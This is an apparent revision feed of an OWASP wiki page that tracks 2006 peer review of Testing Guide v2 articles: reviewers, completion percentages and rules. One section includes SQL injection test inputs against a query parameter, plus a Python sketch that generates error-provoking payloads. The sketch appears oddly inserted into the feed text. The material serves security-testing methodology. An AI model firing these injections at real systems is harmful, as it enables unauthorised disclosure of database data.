** 4.7.6 Failure to Release Resources 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.7 Storing too Much Data in Session 100% Reviewed by Revelli&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.8 Web Services Testing --&amp;gt; Matteo Meucci'''&lt;br /&gt;
6 of 6 articles reviewed&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.8 Web Services Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.1 XML Structural Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.2 XML content-level Testing (90%) Reviewed by Meucci&lt;br /&gt;
** 4.8.3 HTTP GET parameters/REST Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.4 Naughty SOAP attachments (95%) Reviewed by Meucci&lt;br /&gt;
** 4.8.5 Replay Testing (95%) Reviewed by Meucci. '''Need to add code examples, images and proof of impersonation'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.9 AJAX Testing --&amp;gt; Roxberry'''&lt;br /&gt;
3 of 3 articles to be reviewed &lt;br /&gt;
** 4.9 AJAX Testing (70%)&lt;br /&gt;
** 4.9.1 Vulnerabilities (60%)&lt;br /&gt;
** 4.9.2 How to test (60%)&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''5. Writing Reports: value the real risk'''&lt;br /&gt;
We have to write about it. I consider it not yet finished.&lt;br /&gt;
0 of 3 articles to be reviewed.&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix A: Testing Tools --&amp;gt;...'''&lt;br /&gt;
1 article of 1: need to update it by searching the whole guide for &amp;quot;tools&amp;quot; paragraphs&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix B: Suggested Reading --&amp;gt;...'''&lt;br /&gt;
1 article of 1: need to update it by searching the whole guide for &amp;quot;tools&amp;quot; paragraphs&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix C: Fuzz Vectors --&amp;gt; Stefano Di Paola'''&lt;br /&gt;
1 article of 1: Need to be updated&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Reviewers' Rules &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1) Check the English language&amp;lt;br&amp;gt;&lt;br /&gt;
2) Check the template: the articles on chapter 4 should have the following:&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Template (http://www.owasp.org/index.php/Template_Paragraph_Testing_AoC)&lt;br /&gt;
&lt;br /&gt;
In some articles we don't need to talk about Gray Box Testing or other, so we can eliminate it.&lt;br /&gt;
&lt;br /&gt;
3) Check the reference style. (I'd like to have all the referenced URLs visible because I have to produce also a pdf document of the Guide).&lt;br /&gt;
I agree with Stefano, we have to use a reference like that:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;== References ==&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Whitepapers'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [1] Author1, Author2: &amp;quot;Title&amp;quot; - http://www.ietf.org/rfc/rfc2254.txt&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [2]...&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Tools'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* Francois Larouche: &amp;quot;Multiple DBMS Sql Injection tool&amp;quot; - http://www.sqlpowerinjector.com/index.htm &amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4) Check the reference with the other articles of the guide or with the other OWASP Project.&lt;br /&gt;
&lt;br /&gt;
5) Other?&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13151</id>
		<title>OWASP Testing Guide v2 Review Panel</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13151"/>
				<updated>2006-11-16T16:29:07Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents Table of Contents]]&lt;br /&gt;
&lt;br /&gt;
Update: 15th November, 16.00 (GMT+1)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Review planning&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The reviewers are:&lt;br /&gt;
Mark Roxberry,&lt;br /&gt;
Alberto Revelli,&lt;br /&gt;
Daniel Cuthbert,&lt;br /&gt;
Antonio Parata,&lt;br /&gt;
Matteo G.P. Flora,&lt;br /&gt;
Matteo Meucci,&lt;br /&gt;
Eoin Keary,&lt;br /&gt;
Stefano Di Paola,&lt;br /&gt;
James Kist,&lt;br /&gt;
Vicente Aguilera,&lt;br /&gt;
Mauro Bregolin,&lt;br /&gt;
Syed Mohamed A&lt;br /&gt;
&lt;br /&gt;
We can begin the 1st reviewing phase by reviewing all 63 articles (roughly 13 articles per person). The deadline is 15th November at 20.00 (GMT+1), because 15th November is also the 1st deadline for the Autumn of Code Project.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;We are waiting for the following articles &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4.2.2 Spidering and googling (40%, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
4.2.4.2 DB Listener Testing TD (Maybe Eoin?)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.5 HTTP Exploit (0%, Arian J.Evans)&amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.2 Oracle testing TD &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.4 ORM Injection (0%, Mark Roxberry)&amp;lt;br&amp;gt;&lt;br /&gt;
5. Writing Reports: value the real risk&amp;lt;br&amp;gt;&lt;br /&gt;
5.1 How to value the real risk (50%, Daniel Cuthbert, Matteo Meucci, Sebastien Deleersnyder, Marco Morana)&amp;lt;br&amp;gt;&lt;br /&gt;
5.2 How to write the report of the testing (0%, Daniel Cuthbert, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Here is the complete list of articles to be reviewed: &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Introduction --&amp;gt; reviewed by Eoin Keary'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''The OWASP Testing Framework --&amp;gt;...'''&lt;br /&gt;
1 of 1 article to be reviewed &lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.1 Introduction and objectives --&amp;gt;.EK'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.2 Information Gathering (Reviewed by EK) --&amp;gt; Keary'''&lt;br /&gt;
9 of 10 articles reviewed -&amp;gt; &amp;lt;BR&amp;gt; &lt;br /&gt;
* '''Application Discovery''': &lt;br /&gt;
** Reviewed + updated(EK) (Maybe we should include HTTP methods for application discovery, such as the HTTP HEAD command?)&amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) If you are referring to things such as &amp;quot;fingerprinting&amp;quot;, it was suggested - and I personally agree - that we create a new section on Web application fingerprinting. There is, however, some overlap with Infrastructure configuration management testing.&lt;br /&gt;
* '''Analysis of error codes''': &lt;br /&gt;
** Reviewed + updated(EK) &amp;lt;BR&amp;gt;&lt;br /&gt;
** Besides errors that occur on their own, should we also cover deliberately provoking errors? (Vicente). Two examples: &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 1: Type error. (original): ?id=276 (test): ?id=X &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 2: Type conversion error. (original): ?id=276 (test): ?id=276 and 1 in (select top 1 name from sysobjects) &amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) Agree with the above. A testing methodology should be formalized, i.e., the tester should verify whether it is possible to cause information disclosure in error or diagnostic messages by tampering with user-alterable input using a set of techniques (such as type mismatch, overflow/underflow, excess input length, various forms of injection, ...)&lt;br /&gt;
* '''Infrastructure configuration management testing AoC''': &lt;br /&gt;
** Reviewed by EK. '''Not in typical guide structure'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''SSL/TLS Testing AoC''': &lt;br /&gt;
** Reviewed + updated(EK) &amp;lt;BR&amp;gt;&lt;br /&gt;
* '''DB Listener Testing''': &lt;br /&gt;
** '''Incomplete'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''Application configuration management testing''': &lt;br /&gt;
** Reviewed by EK. '''Not typical guide structure'''&lt;br /&gt;
** This is generally a &amp;quot;white box&amp;quot; section. There are no examples of testing the configuration from a remote perspective. If this was the aim of the document, that's fine. '''- Need feedback on this one!!'''&lt;br /&gt;
** ''Sample/known files and directories'': might be good to refer to http://www.owasp.org/index.php/Old_file_testing_AoC ??&lt;br /&gt;
** ''Logging'': Timestamp is also important&lt;br /&gt;
* '''File extensions handling'''&amp;lt;BR&amp;gt;&lt;br /&gt;
** contains the text: &amp;quot;''...To review and expand...''&amp;quot; - '''Is this complete??'''&lt;br /&gt;
** '''Need a second opinion on this one'''!! :)&lt;br /&gt;
* '''Old file testing''': Reviewed by EK&lt;br /&gt;
&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
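The error-provocation methodology proposed under &quot;Analysis of error codes&quot; above could be sketched along these lines. This is only an illustration of the idea: the function name and payload set are hypothetical, not taken from the Guide.

```python
# Hypothetical sketch: derive tampered variants of one user-alterable
# parameter value, each aimed at coaxing a verbose error or diagnostic
# message out of the application. Payload values are illustrative only.

def error_probe_payloads(original):
    """Return tampered variants of an original parameter value."""
    return [
        "X",                  # type mismatch: ?id=276 becomes ?id=X
        original + "9" * 64,  # numeric overflow/underflow attempt
        "A" * 5000,           # excess input length
        # type-conversion error (SQL Server example from above)
        original + " and 1 in (select top 1 name from sysobjects)",
    ]

payloads = error_probe_payloads("276")
# Each payload would replace the original value in the request, and the
# response would be inspected for stack traces, DBMS errors, or debug output.
```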
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.3 Business logic testing --&amp;gt; Meucci'''&lt;br /&gt;
1 of 1 article reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.4 Authentication Testing --&amp;gt; Roxberry (articles have been edited)'''&lt;br /&gt;
0 of 7 articles to be reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.4 Authentication Testing (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Authentication-Testing-Index-Page.aspx Authentication Testing Index]&lt;br /&gt;
** 4.4.1 Default or guessable (dictionary) user account (80%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Default-or-Guessable-User-Account-Testing-AoC.aspx Default or guessable user account review]&lt;br /&gt;
** 4.4.2 Brute Force (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Brute-Force-Testing-AoC.aspx Brute Force review]&lt;br /&gt;
** 4.4.3 Bypassing authentication schema (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Bypassing-Authentication-Schema-AoC.aspx Bypass Authentication review]&lt;br /&gt;
** 4.4.4 Directory traversal/file include (100%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Directory-Traversal-Testing-AOC.aspx Directory Traversal Testing review]&lt;br /&gt;
** 4.4.5 Vulnerable remember password and pwd reset (90%) Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Vulnerable-Remember-Password-and-Pwd-Reset-AoC.aspx Vulnerable Reset Password review]&lt;br /&gt;
** 4.4.6 Logout and Browser Cache Management Testing (100%) Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Logout-and-Browser-Cache-Management-Testing-AoC.aspx Logout and Browser Cache Management Testing review]&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.5 Session Management Testing --&amp;gt; Syed Mohamed A'''&lt;br /&gt;
5 of 6 articles to be reviewed  &lt;br /&gt;
** 4.5 Session Management Testing (95%)&lt;br /&gt;
** 4.5.1 Analysis of the Session Management Schema (90%)&lt;br /&gt;
** 4.5.2 Cookie and Session token Manipulation (100%)&lt;br /&gt;
** 4.5.3 Exposed session variables (90%)&lt;br /&gt;
** 4.5.4 Session Riding (XSRF) (80%)&lt;br /&gt;
** 4.5.5 HTTP Exploit (0%)&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.6 Data Validation Testing --&amp;gt; Meucci'''&lt;br /&gt;
18 articles reviewed (3 are at 0%)&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.6 Data Validation Testing : Reviewed by EK&lt;br /&gt;
** 4.6.1 Cross site scripting: Reviewed by EK (Reformatted it slightly with wiki tags). '''Not completed'''&lt;br /&gt;
** 4.6.1.1 HTTP Methods and XST Reviewed by MM. Reviewed by AP.&lt;br /&gt;
** 4.6.2 SQL Injection (90%) Reviewed by MM. Reviewed by EK.&lt;br /&gt;
*** Not sure about &amp;quot;inferential&amp;quot; injection definition in &amp;quot;Description of Issue&amp;quot;&lt;br /&gt;
*** Added some reference to Oracle. Corrected English.&lt;br /&gt;
** 4.6.2.1 Stored procedure injection (40%) '''TD (not enough information)'''&lt;br /&gt;
** 4.6.2.2 Oracle testing (0%) '''TD (not enough information)'''&lt;br /&gt;
** 4.6.2.3 MySQL testing (100%) Reviewed by MM&lt;br /&gt;
** 4.6.2.4 SQL Server testing (95%) Reviewed by MM. '''tools?'''&lt;br /&gt;
** 4.6.3 LDAP Injection (90%) Reviewed by MM added wp and tools&lt;br /&gt;
** 4.6.4 ORM Injection (0%) '''TD (not enough information)'''&lt;br /&gt;
** 4.6.5 XML Injection (90%) Reviewed and updated by MM. '''WP and tools?'''&lt;br /&gt;
** 4.6.6 SSI Injection (95%) Reviewed by MM &lt;br /&gt;
** 4.6.7 XPath Injection (80%) Reviewed by MM. '''Gray box section still to be completed?'''&lt;br /&gt;
** 4.6.8 IMAP/SMTP Injection (95%) Reviewed by MM&lt;br /&gt;
** 4.6.9 Code Injection (70%) Reviewed by MM. '''Not completed'''&lt;br /&gt;
** 4.6.10 OS Commanding (70%) Reviewed by MM. '''Not completed'''&lt;br /&gt;
** 4.6.11 Buffer overflow Testing (100%) Reviewed by MM. '''Note: these tests are not usual web app tests'''&lt;br /&gt;
*** (Bregolin) The point is that these are not black box tests, so where they are now they are misplaced&lt;br /&gt;
** 4.6.11.1 Heap overflow (100%) Reviewed by MM&lt;br /&gt;
** 4.6.11.2 Stack overflow (100%) Reviewed by MM&lt;br /&gt;
** 4.6.11.3 Format string (100%) Reviewed by MM&lt;br /&gt;
** 4.6.12 Incubated vulnerability testing (95%) Reviewed by MM, whitepapers?&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''4.7 Denial of Service Testing--&amp;gt; Revelli'''&lt;br /&gt;
8 of 8 articles Reviewed&lt;br /&gt;
'''[OK] - To do the References'''&lt;br /&gt;
** 4.7 Denial of Service Testing 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.1 Locking Customer Accounts 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.2 Buffer Overflows 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.3 User Specified Object Allocation 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.4 User Input as a Loop Counter 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.5 Writing User Provided Data to Disk 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.6 Failure to Release Resources 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.7 Storing too Much Data in Session 100% Reviewed by Revelli&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.8 Web Services Testing --&amp;gt; Matteo Meucci'''&lt;br /&gt;
6 of 6 articles reviewed&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.8 Web Services Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.1 XML Structural Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.2 XML content-level Testing (90%) Reviewed by Meucci&lt;br /&gt;
** 4.8.3 HTTP GET parameters/REST Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.4 Naughty SOAP attachments (95%) Reviewed by Meucci&lt;br /&gt;
** 4.8.5 Replay Testing (95%) Reviewed by Meucci. '''Need to add code examples, images and proof of impersonation'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.9 AJAX Testing --&amp;gt; Roxberry'''&lt;br /&gt;
3 of 3 articles to be reviewed &lt;br /&gt;
** 4.9 AJAX Testing (70%)&lt;br /&gt;
** 4.9.1 Vulnerabilities (60%)&lt;br /&gt;
** 4.9.2 How to test (60%)&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''5. Writing Reports: value the real risk'''&lt;br /&gt;
We still have to write this section; I consider it unfinished.&lt;br /&gt;
0 of 3 articles to be reviewed.&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix A: Testing Tools --&amp;gt;...'''&lt;br /&gt;
1 article of 1: needs updating by searching the whole guide for the Tools paragraphs&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix B: Suggested Reading --&amp;gt;...'''&lt;br /&gt;
1 article of 1: needs updating by searching the whole guide for the Tools paragraphs&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix C: Fuzz Vectors --&amp;gt; Stefano Di Paola'''&lt;br /&gt;
1 article of 1: Needs to be updated&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Reviewers' Rules &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1) Check the English language&amp;lt;br&amp;gt;&lt;br /&gt;
2) Check the template: the articles in chapter 4 should have the following:&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Template (http://www.owasp.org/index.php/Template_Paragraph_Testing_AoC)&lt;br /&gt;
&lt;br /&gt;
In some articles we don't need to discuss Gray Box Testing or other sections, so we can eliminate them.&lt;br /&gt;
&lt;br /&gt;
3) Check the reference style. (I'd like all the referenced URLs to be visible, because I also have to produce a PDF version of the Guide.)&lt;br /&gt;
I agree with Stefano: we should use a reference format like this:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;== References ==&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Whitepapers'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [1] Author1, Author2: &amp;quot;Title&amp;quot; - http://www.ietf.org/rfc/rfc2254.txt&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [2]...&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Tools'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* Francois Larouche: &amp;quot;Multiple DBMS Sql Injection tool&amp;quot; - http://www.sqlpowerinjector.com/index.htm &amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4) Check cross-references to the other articles of the Guide and to other OWASP Projects.&lt;br /&gt;
&lt;br /&gt;
5) Other?&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13150</id>
		<title>OWASP Testing Guide v2 Review Panel</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13150"/>
				<updated>2006-11-16T16:23:22Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents Table of Contents]]&lt;br /&gt;
&lt;br /&gt;
Update: 15th November, 16.00 (GMT+1)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Review planning&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The reviewers are:&lt;br /&gt;
Mark Roxberry,&lt;br /&gt;
Alberto Revelli,&lt;br /&gt;
Daniel Cuthbert,&lt;br /&gt;
Antonio Parata,&lt;br /&gt;
Matteo G.P. Flora,&lt;br /&gt;
Matteo Meucci,&lt;br /&gt;
Eoin Keary,&lt;br /&gt;
Stefano Di Paola,&lt;br /&gt;
James Kist,&lt;br /&gt;
Vicente Aguilera,&lt;br /&gt;
Mauro Bregolin,&lt;br /&gt;
Syed Mohamed A&lt;br /&gt;
&lt;br /&gt;
We can begin the 1st reviewing phase by reviewing all 63 articles (roughly 13 articles per person). The deadline is 15th November at 20.00 (GMT+1), because 15th November is also the 1st deadline for the Autumn of Code Project.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;We are waiting for the following articles &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4.2.2 Spidering and googling (40%, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
4.2.4.2 DB Listener Testing TD (Maybe Eoin?)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.5 HTTP Exploit (0%, Arian J.Evans)&amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.2 Oracle testing TD &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.4 ORM Injection (0%, Mark Roxberry)&amp;lt;br&amp;gt;&lt;br /&gt;
5. Writing Reports: value the real risk&amp;lt;br&amp;gt;&lt;br /&gt;
5.1 How to value the real risk (50%, Daniel Cuthbert, Matteo Meucci, Sebastien Deleersnyder, Marco Morana)&amp;lt;br&amp;gt;&lt;br /&gt;
5.2 How to write the report of the testing (0%, Daniel Cuthbert, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Here is the complete list of articles to be reviewed: &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Introduction --&amp;gt; reviewed by Eoin Keary'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''The OWASP Testing Framework --&amp;gt;...'''&lt;br /&gt;
1 of 1 article to be reviewed &lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.1 Introduction and objectives --&amp;gt;.EK'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.2 Information Gathering (Reviewed by EK) --&amp;gt; Keary'''&lt;br /&gt;
9 of 10 articles reviewed -&amp;gt; &amp;lt;BR&amp;gt; &lt;br /&gt;
* '''Application Discovery''': &lt;br /&gt;
** Reviewed + updated(EK) (Maybe we should include HTTP methods for application discovery, such as the HTTP HEAD command?)&amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) If you are referring to things such as &amp;quot;fingerprinting&amp;quot;, it was suggested - and I personally agree - that we create a new section on Web application fingerprinting. There is, however, some overlap with Infrastructure configuration management testing.&lt;br /&gt;
* '''Analysis of error codes''': &lt;br /&gt;
** Reviewed + updated(EK) &amp;lt;BR&amp;gt;&lt;br /&gt;
** Besides errors that occur on their own, should we also cover deliberately provoking errors? (Vicente). Two examples: &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 1: Type error. (original): ?id=276 (test): ?id=X &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 2: Type conversion error. (original): ?id=276 (test): ?id=276 and 1 in (select top 1 name from sysobjects) &amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) Agree with the above. A testing methodology should be formalized, i.e., the tester should verify whether it is possible to cause information disclosure in error or diagnostic messages by tampering with user-alterable input using a set of techniques (such as type mismatch, overflow/underflow, excess input length, various forms of injection, ...)&lt;br /&gt;
* '''Infrastructure configuration management testing AoC''': &lt;br /&gt;
** Reviewed by EK. '''Not in typical guide structure'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''SSL/TLS Testing AoC''': &lt;br /&gt;
** Reviewed + updated(EK) &amp;lt;BR&amp;gt;&lt;br /&gt;
* '''DB Listener Testing''': &lt;br /&gt;
** '''Incomplete'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''Application configuration management testing''': &lt;br /&gt;
** Reviewed by EK. '''Not typical guide structure'''&lt;br /&gt;
** This is generally a &amp;quot;white box&amp;quot; section. There are no examples of testing the configuration from a remote perspective. If this was the aim of the document, that's fine. '''- Need feedback on this one!!'''&lt;br /&gt;
** ''Sample/known files and directories'': might be good to refer to http://www.owasp.org/index.php/Old_file_testing_AoC ??&lt;br /&gt;
** ''Logging'': Timestamp is also important&lt;br /&gt;
* '''File extensions handling'''&amp;lt;BR&amp;gt;&lt;br /&gt;
** contains the text: &amp;quot;''...To review and expand...''&amp;quot; - '''Is this complete??'''&lt;br /&gt;
** '''Need a second opinion on this one'''!! :)&lt;br /&gt;
* '''Old file testing''': Reviewed by EK&lt;br /&gt;
&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.3 Business logic testing --&amp;gt; Meucci'''&lt;br /&gt;
1 of 1 article reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.4 Authentication Testing --&amp;gt; Roxberry (articles have been edited)'''&lt;br /&gt;
